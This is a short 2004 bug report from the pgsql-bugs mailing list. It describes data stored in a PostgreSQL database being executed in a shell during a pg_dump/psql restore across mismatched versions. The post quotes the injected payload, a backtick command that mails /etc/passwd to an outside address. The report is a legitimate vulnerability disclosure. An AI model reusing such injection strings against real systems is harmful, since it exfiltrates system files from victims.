syntax error causes crafted data to be executed in shell - Mailing list pgsql-bugs

From Thomer M. Gil
Subject syntax error causes crafted data to be executed in shell
Date
Msg-id 20041217183802.GA26196@dataloss.thomer.com
Responses Re: syntax error causes crafted data to be executed in shell  (Tom Lane <tgl@sss.pgh.pa.us>)
List pgsql-bugs
Short summary:

    1.  Someone wrote "`mail blah@blah.com < /etc/passwd`" in a web form;
        this string was stored in a postgresql database.
    2.  We ran pg_dump
    3.  We ran psql (not the same version as pg_dump!)
    4.  blah@blah.com receives /etc/passwd

More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=285844

Thank you,

Thomer
